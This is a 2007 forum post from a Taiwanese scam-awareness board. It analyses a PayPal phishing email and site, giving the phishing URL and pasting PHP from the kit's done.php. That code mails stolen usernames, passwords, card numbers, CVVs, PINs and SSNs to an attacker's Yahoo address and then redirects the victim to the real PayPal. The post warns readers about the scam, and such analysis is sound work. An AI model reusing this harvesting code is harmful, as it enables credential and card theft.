作者boeshan (= =)
看板Bunco
标题Re: [网路]GMail收到的Paypal诈骗信
时间Wed Jul 11 14:47:30 2007
恕删~
我不是paypal会员 今天也在gmail收到这封诈骗信
来源是日本
网站做的很像paypal登入画面
下面这是诈骗网站
http://219.42.20.3/icons/cmd/cgi_bin/cmd_login/
Member Log-In那里 其实乱打帐号密码就可以进去了
废话 因为他们要骗你的帐号密码
server是apache 1.3 目录浏览没关
我去抓他的php档案下来看 发现是三个档案在处理的
分别为 index.php webscr-cmd_personal-run.php 跟 done.php
他很贼 我本来以为他会把user data存入database
看了程式才发现原来是把data寄到一个雅虎信箱
贴上done.php部份程式码
//sending email info here
$subj = "CC=$card | Exp=$expm/$expy | Cvv=$cvv | Pin=$pin";
$msg = "**************************************************\nUsername:
$user\nPassword:
$password\n**************************************************\nFull Name:
$firstname $lastname\nDate of Birth: $a / $b / $c\nMother Maiden Name:
$mother\nAddress: $address\nCity: $city\nState: $state\nZip: $zip\nHome
Phone:
$night_phone_a-$night_phone_b-$night_phone_c\n**************************************************\nCredit
Card Number: $card\nExpiration Date: $expm / $expy\nCvv: $cvv\nPin:
$pin\nSsn:
$ssn1-$ssn2-$ssn3\n**************************************************\nIP
Address: $ip";
$from = "From: paypal<
[email protected]>";
mail("
[email protected]", $subj, $msg, $from);
header("Location:
https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&login_email=$user&login_password=$password&cmd=_login-submit");
看到没 他会把user data (信用卡资料什麽鬼的)寄到
[email protected]
更贼的是他蒐集完你的资料後 会把你导向到paypal的网站
让你被盗资料後还浑然不知 = =
大家不要在受骗了QQ
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 123.240.106.16
1F:推 nataray:可惜现在Yahoo信箱空间无上限,不然就灌爆它 XDDDDD 07/11 15:03